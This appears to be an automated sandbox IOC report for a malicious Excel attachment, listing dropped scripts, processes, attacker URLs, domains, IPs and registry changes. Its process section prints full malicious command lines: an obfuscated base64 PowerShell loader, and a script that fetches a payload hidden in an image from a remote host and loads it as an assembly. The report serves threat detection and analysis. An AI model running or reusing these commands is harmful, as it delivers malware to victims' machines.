IOC Report
xF3wienia PO2102559-1.xlsx

loading gif

Files

File Path
Type
Category
Malicious
xF3wienia PO2102559-1.xlsx
Microsoft Excel 2007+
initial sample
 malicious
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\prnportjjm[1].vbs
Unicode text, UTF-16, little-endian text, with very long lines (771), with CRLF line terminators
dropped
 malicious
C:\Users\user\AppData\Roaming\prnport.vbs
Unicode text, UTF-16, little-endian text, with very long lines (771), with CRLF line terminators
dropped
 malicious
C:\ProgramData\word.vbs
Non-ISO extended-ASCII text, with CRLF line terminators
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
data
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
data
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\yk0CXsC5[1].txt
Unicode text, UTF-8 text, with very long lines (11670), with CRLF line terminators
dropped
C:\Users\user\AppData\Local\Temp\2env224q.jgi.ps1
very short file (no magic)
dropped
C:\Users\user\AppData\Local\Temp\F0B5.tmp
Composite Document File V2 Document, Cannot read section info
dropped
C:\Users\user\AppData\Local\Temp\brjdi3nn.p5i.ps1
very short file (no magic)
dropped
C:\Users\user\AppData\Local\Temp\eadvw4jj.1zw.psm1
very short file (no magic)
dropped
C:\Users\user\AppData\Local\Temp\jt425jzm.yv4.ps1
very short file (no magic)
dropped
C:\Users\user\AppData\Local\Temp\k1albv2k.agm.psm1
very short file (no magic)
dropped
C:\Users\user\AppData\Local\Temp\k4b1llsj.uv2.psm1
very short file (no magic)
dropped
C:\Users\user\AppData\Local\Temp\~DFD41FACE3FBBCF23F.TMP
data
dropped
C:\Users\user\Desktop\~$xF3wienia PO2102559-1.xlsx
data
dropped
There are 6 hidden files, click here to show them.

Processes

Path
Cmdline
Malicious
C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
 malicious
C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
 malicious
C:\Windows\SysWOW64\wscript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\prnport.vbs"
malicious
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$codigo = 'ZgB1DgTreG4DgTreYwB0DgTreGkDgTrebwBuDgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB7DgTreCDgTreDgTrecDgTreBhDgTreHIDgTreYQBtDgTreCDgTreDgTreKDgTreBbDgTreHMDgTredDgTreByDgTreGkDgTrebgBnDgTreFsDgTreXQBdDgTreCQDgTrebDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreCDgTreDgTrePQDgTregDgTreE4DgTreZQB3DgTreC0DgTreTwBiDgTreGoDgTreZQBjDgTreHQDgTreIDgTreBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreE4DgTreZQB0DgTreC4DgTreVwBlDgTreGIDgTreQwBsDgTreGkDgTreZQBuDgTreHQDgTreOwDgTregDgTreCQDgTreZDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreGUDgTreZDgTreBEDgTreGEDgTredDgTreBhDgTreCDgTreDgTrePQDgTregDgTreEDgTreDgTreKDgTreDgTrepDgTreDsDgTreIDgTreDgTrekDgTreHMDgTreaDgTreB1DgTreGYDgTreZgBsDgTreGUDgTreZDgTreBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB8DgTreCDgTreDgTreRwBlDgTreHQDgTreLQBSDgTreGEDgTrebgBkDgTreG8DgTrebQDgTregDgTreC0DgTreQwBvDgTreHUDgTrebgB0DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreLgBMDgTreGUDgTrebgBnDgTreHQDgTreaDgTreDgTre7DgTreCDgTreDgTreZgBvDgTreHIDgTreZQBhDgTreGMDgTreaDgTreDgTregDgTreCgDgTreJDgTreBsDgTreGkDgTrebgBrDgTreCDgTreDgTreaQBuDgTreCDgTreDgTreJDgTreBzDgTreGgDgTredQBmDgTreGYDgTrebDgTreBlDgTreGQDgTreTDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreB7DgTreCDgTreDgTredDgTreByDgTreHkDgTreIDgTreB7DgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreDgTrerDgTreD0DgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreC4DgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreKDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTreKQDgTregDgTreH0DgTreIDgTreBjDgTreGEDgTredDgTreBjDgTreGgDgTreIDgTreB7DgTreCDgTreDgTreYwBvDgTreG4DgTredDgTreBpDgTreG4DgTredQBlDgTreCDgTreDgTrefQDgTregDgTreH0DgTreOwDgTregDgTreHIDgTreZQB0DgTreHUDgTrecgBuDgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreB9DgTreDsDgTreIDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTrecwDgTregDgTreD0DgTreIDgTreBDgTreDgTreCgDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhDgTreGcDgTreZQBzDgTreC8DgTreMDgTreDgTrewDgTreDQDgTreLwDgTre3DgTreDcDgTreMQDgTrevDgTreDUDgTreNDgTreDgTreyDgTreC8DgTrebwByDgTreGkDgTreZwBpDgTreG4DgTreYQBsDgTreC8DgTrebgBlDgTreHcDgTreXwBpDgTreG0DgTreYQBnDgTreGUDgTreLgBqDgTreHDgTreDgTreZwDgTre/DgTreDEDgTreNwDgTrexDgTreDMDgTreMwDgTre5DgTreDQDgTreODgTreDgTreyDgTreDDgTreDgTreJwDgTresDgTreCDgTreDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhDgTreGcDgTreZQBzDgTreC8DgTreMDgTreDgTrewDgTreDQDgTreLwDgTre3DgTreDcDgTreMQDgTrevDgTreDUDgTreNDgTreDgTreyDgTreC8DgTrebwByDgTreGkDgTreZwBpDgTreG4DgTreYQBsDgTreC8DgTrebgBlDgTreHcDgTreXwBpDgTreG0DgTreYQBnDgTreGUDgTreLgBqDgTreHDgTreDgTreZwDgTre/DgTreDEDgTreNwDgTrexDgTreDMDgTreMwDgTre5DgTreDQDgTreODgTreDgTreyDgTreDDgTreDgTreJwDgTrepDgTreDsDgTreIDgTreDgTrekDgTreGkDgTrebQBhDgTreGcDgTreZQBCDgTreHkDgTredDgTreBlDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTrecwDgTre7DgTreCDgTreDgTreaQBmDgTreCDgTreDgTreKDgTreDgTrekDgTreGkDgTrebQBhDgTreGcDgTreZQBCDgTreHkDgTredDgTreBlDgTreHMDgTreIDgTreDgTretDgTreG4DgTreZQDgTregDgTreCQDgTrebgB1DgTreGwDgTrebDgTreDgTrepDgTreCDgTreDgTreewDgTregDgTreCQDgTreaQBtDgTreGEDgTreZwBlDgTreFQDgTreZQB4DgTreHQDgTreIDgTreDgTre9DgTreCDgTreDgTreWwBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreFQDgTreZQB4DgTreHQDgTreLgBFDgTreG4DgTreYwBvDgTreGQDgTreaQBuDgTreGcDgTreXQDgTre6DgTreDoDgTreVQBUDgTreEYDgTreODgTreDgTreuDgTreEcDgTreZQB0DgTreFMDgTredDgTreByDgTreGkDgTrebgBnDgTreCgDgTreJDgTreBpDgTreG0DgTreYQBnDgTreGUDgTreQgB5DgTreHQDgTreZQBzDgTreCkDgTreOwDgTregDgTreCQDgTrecwB0DgTreGEDgTrecgB0DgTreEYDgTrebDgTreBhDgTreGcDgTreIDgTreDgTre9DgTreCDgTreDgTreJwDgTre8DgTreDwDgTreQgBBDgTreFMDgTreRQDgTre2DgTreDQDgTreXwBTDgTreFQDgTreQQBSDgTreFQDgTrePgDgTre+DgTreCcDgTreOwDgTregDgTreCQDgTreZQBuDgTreGQDgTreRgBsDgTreGEDgTreZwDgTregDgTreD0DgTreIDgTreDgTrenDgTreDwDgTrePDgTreBCDgTreEEDgTreUwBFDgTreDYDgTreNDgTreBfDgTreEUDgTreTgBEDgTreD4DgTrePgDgTrenDgTreDsDgTreIDgTreDgTrekDgTreHMDgTredDgTreBhDgTreHIDgTredDgTreBJDgTreG4DgTreZDgTreBlDgTreHgDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBpDgTreG0DgTreYQBnDgTreGUDgTreVDgTreBlDgTreHgDgTredDgTreDgTreuDgTreEkDgTrebgBkDgTreGUDgTreeDgTreBPDgTreGYDgTreKDgTreDgTrekDgTreHMDgTredDgTreBhDgTreHIDgTredDgTreBGDgTreGwDgTreYQBnDgTreCkDgTreOwDgTregDgTreCQDgTreZQBuDgTreGQDgTreSQBuDgTreGQDgTreZQB4DgTreCDgTreDgTrePQDgTregDgTreCQDgTreaQBtDgTreGEDgTreZwBlDgTreFQDgTreZQB4DgTreHQDgTreLgBJDgTreG4DgTreZDgTreBlDgTreHgDgTreTwBmDgTreCgDgTreJDgTreBlDgTreG4DgTreZDgTreBGDgTreGwDgTreYQBnDgTreCkDgTreOwDgTregDgTreGkDgTreZgDgTregDgTreCgDgTreJDgTreBzDgTreHQDgTreYQByDgTreHQDgTreSQBuDgTreGQDgTreZQB4DgTreCDgTreDgTreLQBnDgTreGUDgTreIDgTreDgTrewDgTreCDgTreDgTreLQBhDgTreG4DgTreZDgTreDgTregDgTreCQDgTreZQBuDgTreGQDgTreSQBuDgTreGQDgTreZQB4DgTreCDgTreDgTreLQBnDgTreHQDgTreIDgTreDgTrekDgTreHMDgTredDgTreBhDgTreHIDgTredDgTreBJDgTreG4DgTreZDgTreBlDgTreHgDgTreKQDgTregDgTreHsDgTreIDgTreDgTrekDgTreHMDgTredDgTreBhDgTreHIDgTredDgTreBJDgTreG4DgTreZDgTreBlDgTreHgDgTreIDgTreDgTrerDgTreD0DgTreIDgTreDgTrekDgTreHMDgTredDgTreBhDgTreHIDgTredDgTreBGDgTreGwDgTreYQBnDgTreC4DgTreTDgTreBlDgTreG4DgTreZwB0DgTreGgDgTreOwDgTregDgTreCQDgTreYgBhDgTreHMDgTreZQDgTre2DgTreDQDgTreTDgTreBlDgTreG4DgTreZwB0DgTreGgDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBlDgTreG4DgTreZDgTreBJDgTreG4DgTreZDgTreBlDgTreHgDgTreIDgTreDgTretDgTreCDgTreDgTreJDgTreBzDgTreHQDgTreYQByDgTreHQDgTreSQBuDgTreGQDgTreZQB4DgTreDsDgTreIDgTreDgTrekDgTreGIDgTreYQBzDgTreGUDgTreNgDgTre0DgTreEMDgTrebwBtDgTreG0DgTreYQBuDgTreGQDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBpDgTreG0DgTreYQBnDgTreGUDgTreVDgTreBlDgTreHgDgTredDgTreDgTreuDgTreFMDgTredQBiDgTreHMDgTredDgTreByDgTreGkDgTrebgBnDgTreCgDgTreJDgTreBzDgTreHQDgTreYQByDgTreHQDgTreSQBuDgTreGQDgTreZQB4DgTreCwDgTreIDgTreDgTrekDgTreGIDgTreYQBzDgTreGUDgTreNgDgTre0DgTreEwDgTreZQBuDgTreGcDgTredDgTreBoDgTreCkDgTreOwDgTregDgTreCQDgTreYwBvDgTreG0DgTrebQBhDgTreG4DgTreZDgTreBCDgTreHkDgTredDgTreBlDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreWwBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreEMDgTrebwBuDgTreHYDgTreZQByDgTreHQDgTreXQDgTre6DgTreDoDgTreRgByDgTreG8DgTrebQBCDgTreGEDgTrecwBlDgTreDYDgTreNDgTreBTDgTreHQDgTrecgBpDgTreG4DgTreZwDgTreoDgTreCQDgTreYgBhDgTreHMDgTreZQDgTre2DgTreDQDgTreQwBvDgTreG0DgTrebQBhDgTreG4DgTreZDgTreDgTrepDgTreDsDgTreIDgTreDgTrekDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEEDgTrecwBzDgTreGUDgTrebQBiDgTreGwDgTreeQDgTregDgTreD0DgTreIDgTreBbDgTreFMDgTreeQBzDgTreHQDgTreZQBtDgTreC4DgTreUgBlDgTreGYDgTrebDgTreBlDgTreGMDgTredDgTreBpDgTreG8DgTrebgDgTreuDgTreEEDgTrecwBzDgTreGUDgTrebQBiDgTreGwDgTreeQBdDgTreDoDgTreOgBMDgTreG8DgTreYQBkDgTreCgDgTreJDgTreBjDgTreG8DgTrebQBtDgTreGEDgTrebgBkDgTreEIDgTreeQB0DgTreGUDgTrecwDgTrepDgTreDsDgTreIDgTreDgTrekDgTreHQDgTreeQBwDgTreGUDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBsDgTreG8DgTreYQBkDgTreGUDgTreZDgTreBBDgTreHMDgTrecwBlDgTreG0DgTreYgBsDgTreHkDgTreLgBHDgTreGUDgTredDgTreBUDgTreHkDgTrecDgTreBlDgTreCgDgTreJwBQDgTreFIDgTreTwBKDgTreEUDgTreVDgTreBPDgTreEEDgTreVQBUDgTreE8DgTreTQBBDgTreEMDgTreQQBPDgTreC4DgTreVgBCDgTreC4DgTreSDgTreBvDgTreG0DgTreZQDgTrenDgTreCkDgTreOwDgTregDgTreCQDgTrebQBlDgTreHQDgTreaDgTreBvDgTreGQDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreB0DgTreHkDgTrecDgTreBlDgTreC4DgTreRwBlDgTreHQDgTreTQBlDgTreHQDgTreaDgTreBvDgTreGQDgTreKDgTreDgTrenDgTreFYDgTreQQBJDgTreCcDgTreKQDgTreuDgTreEkDgTrebgB2DgTreG8DgTreawBlDgTreCgDgTreJDgTreBuDgTreHUDgTrebDgTreBsDgTreCwDgTreIDgTreBbDgTreG8DgTreYgBqDgTreGUDgTreYwB0DgTreFsDgTreXQBdDgTreCDgTreDgTreKDgTreDgTrenDgTreHQDgTreeDgTreB0DgTreC4DgTreMwDgTreyDgTreGoDgTreLwBvDgTreGIDgTrebQBpDgTreGoDgTreLwB1DgTreGUDgTreLgBzDgTreG4DgTreZDgTreB5DgTreC4DgTreaQBhDgTreGoDgTreYQDgTrevDgTreC8DgTreOgBwDgTreHQDgTredDgTreBoDgTreCcDgTreIDgTreDgTresDgTreCDgTreDgTreJwDgTrexDgTreCcDgTreIDgTreDgTresDgTreCDgTreDgTreJwBDDgTreDoDgTreXDgTreBQDgTreHIDgTrebwBnDgTreHIDgTreYQBtDgTreEQDgTreYQB0DgTreGEDgTreXDgTreDgTrenDgTreCDgTreDgTreLDgTreDgTregDgTreCcDgTredwBvDgTreHIDgTreZDgTreDgTrenDgTreCwDgTreJwBBDgTreGQDgTreZDgTreBJDgTreG4DgTreUDgTreByDgTreG8DgTreYwBlDgTreHMDgTrecwDgTrezDgTreDIDgTreJwDgTresDgTreCcDgTreJwDgTrepDgTreCkDgTrefQDgTregDgTreH0DgTre';$oWjuxd = [system.Text.encoding]::Unicode.GetString([system.convert]::Frombase64string( $codigo.replace('DgTre','A') ));powershell.exe -windowstyle hidden -executionpolicy bypass -Noprofile -command $OWjuxD"
malicious
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $downloadedData = @(); $shuffledLinks = $links | Get-Random -Count $links.Length; foreach ($link in $shuffledLinks) { try { $downloadedData += $webClient.DownloadData($link) } catch { continue } }; return $downloadedData }; $links = @('https://uploaddeimagens.com.br/images/004/771/542/original/new_image.jpg?1713394820', 'https://uploaddeimagens.com.br/images/004/771/542/original/new_image.jpg?1713394820'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('PROJETOAUTOMACAO.VB.Home'); $method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.32j/obmij/ue.sndy.iaja//:ptth' , '1' , 'C:\ProgramData\' , 'word','AddInProcess32',''))} }"
malicious
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden Copy-Item -Path *.vbs -Destination C:\ProgramData\word.vbs
 malicious
C:\Windows\System32\wscript.exe
"C:\Windows\System32\WScript.exe" "C:\ProgramData\word.vbs"
malicious
C:\Windows\System32\wscript.exe
"C:\Windows\System32\WScript.exe" "C:\ProgramData\word.vbs"
malicious

URLs

Name
IP
Malicious
http://blessy.ydns.eu/jimbo/prnportjjm.vbs
5.182.211.151
 malicious
https://uploaddeimagens.com.br/images/00
unknown
 malicious
https://uploaddeimagens.com.br
unknown
 malicious
https://uploaddeimagens.com.br/images/004/771/542/original/new_image.jpg?1713394820
172.67.215.45
 malicious
http://nuget.org/NuGet.exe
unknown
http://crl.entrust.net/server1.crl0
unknown
http://ocsp.entrust.net03
unknown
https://contoso.com/License
unknown
https://contoso.com/Icon
unknown
http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0
unknown
http://www.diginotar.nl/cps/pkioverheid0
unknown
http://blessy.ydns.eu/jimbo/prnportjjm.vbsj
unknown
https://pastebin.com/Th
unknown
http://crl.pkioverheid.nl/DomOvLatestCRL.crl0
unknown
https://pastebin.com/raw/yk0CXsC5
172.67.19.24
https://lesferch.github.io/DesktopPic
unknown
https://contoso.com/
unknown
https://nuget.org/nuget.exe
unknown
http://blessy.ydns.eu/jimbo/prnportjjm.vbsoP
unknown
http://blessy.ydns.eu/jimbo/prnportjjm.vbsooC:
unknown
http://ocsp.entrust.net0D
unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
unknown
https://secure.comodo.com/CPS0
unknown
https://pastebin.com/Sh
unknown
http://crl.entrust.net/2048ca.crl0
unknown
http://blessy.ydns.eu/jimbo/prnportjjm.vbsD
unknown
There are 16 hidden URLs, click here to show them.

Domains

Name
IP
Malicious
blessy.ydns.eu
5.182.211.151
 malicious
uploaddeimagens.com.br
172.67.215.45
 malicious
ajai.ydns.eu
23.226.132.239
pastebin.com
104.20.4.235

IPs

IP
Domain
Country
Malicious
172.67.19.24
unknown
United States
malicious
5.182.211.151
blessy.ydns.eu
Netherlands
malicious
172.67.215.45
uploaddeimagens.com.br
United States
malicious

Registry

Path
Value
Malicious
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8
Blob
 malicious
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\12891DF7B048CD69D0196C8AD7A754C8A812A08C
Blob
 malicious
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8
Blob
 malicious
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8
Blob
 malicious
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8
Blob
 malicious
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8
Blob
 malicious
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\12891DF7B048CD69D0196C8AD7A754C8A812A08C
Blob
 malicious
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
Path
 malicious
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems
{-.
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Outlook\Journaling\Microsoft Excel
Enabled
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel
MTTT
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\ReviewCycle
ReviewToken
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\DocumentRecovery\28556
28556
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems
k2.
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Place MRU
Max Display
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Max Display
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 1
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 2
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 3
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 4
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 5
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 6
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 7
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 8
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 9
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 10
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 11
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 12
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 13
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 14
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 15
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 16
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 17
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 18
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 19
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 20
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\DocumentRecovery\2F132
2F132
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Place MRU
Max Display
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Max Display
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 1
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 2
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 3
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 4
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 5
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 6
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 7
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 8
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 9
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 10
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 11
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 12
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 13
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 14
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 15
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 16
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 17
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 18
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 19
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 20
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\DocumentRecovery\2F180
2F180
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Security\Trusted Documents
LastPurgeTime
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
1033
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
1033
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000100000000F01FEC\Usage
EXCELFiles
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000100000000F01FEC\Usage
ProductFiles
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000100000000F01FEC\Usage
VBAFiles
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109E60090400100000000F01FEC\Usage
EquationEditorFilesIntl_1033
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.vbs\OpenWithProgids
VBSFile
HKEY_CURRENT_USER_CLASSES\Local Settings\MuiCache\159\52C64B7E
@C:\Windows\System32\wshext.dll,-4511
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109E60090400100000000F01FEC\Usage
EquationEditorFilesIntl_1033
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections
SavedLegacySettings
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections
SavedLegacySettings
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\powershell_RASAPI32
EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\powershell_RASAPI32
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\powershell_RASAPI32
FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\powershell_RASAPI32
ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\powershell_RASAPI32
MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\powershell_RASAPI32
FileDirectory
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\powershell_RASMANCS
EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\powershell_RASMANCS
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\powershell_RASMANCS
FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\powershell_RASMANCS
ConsoleTracingMask
